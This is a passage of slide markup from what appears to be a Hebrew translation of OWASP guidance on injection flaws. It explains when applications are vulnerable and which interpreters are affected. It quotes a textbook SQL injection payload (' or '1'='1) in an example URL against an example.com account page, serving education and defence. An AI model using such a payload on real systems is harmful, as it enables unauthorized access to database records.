                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>בשני המקרים, התוקף משנה את ערך פרמטר </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>‘id’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ברמת הדפדפן ושולח </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' or '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. לדוגמא:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  http://example.com/app/accountView?id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הדבר משנה את משמעות שתי השאילתות וגורם להן להחזיר את כל הרשומות בטבלת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. מתקפה מסוכנת יותר עשויה לעדכן או למחוק מידע, או לגרום להרצת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stored procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466100" y="3132000"/>
            <a:ext cx="3383280" cy="316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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האם היישום פגיע?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>היישום פגיע להתקפה כאשר:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>מידע אשר הוזן ע"י המשתמש לא עבר וידוא, סינון, או הסרת תווים זדוניים ע"י היישום עצמו.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>שאילתות דינאמיות או קריאות חסרות פרמטרים ללא ביצוע </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> בהתאם להקשר עצמו, אשר בשימוש ישיר ע"י רכיב התרגום.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>מידע זדוני בשימוש פרמטרים לחיפוש ב- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>object-relational mapping (ORM)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, לטובת הוצאת מידע רגיש.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>מידע זדוני הנמצא בשימוש ישיר או משורשר, כגון שאילתות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או פקודות המכילות מידע מובנה ומידע זדוני בתוך שאילתות דינאמיות, פקודות או </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stored procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>חלק מהמתקפות השכיחות של הזרקת קוד עוין הינן שאילתות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, שאילתות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NoSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, פקודות מערכת הפעלה, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Object Relational Mapping (ORM)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, שאילתות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, וכן </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Expression Language (EL) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או הזרקות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Object Graph Navigation Library (OGNL)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הרעיון זהה בקרב כלל רכיבי התרגום. בחינת הקוד הינה הדרך הטובה ביותר לגילוי האם היישום פגיע למתקפות הזרקת קוד, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, קוד </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, וקלט מ-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
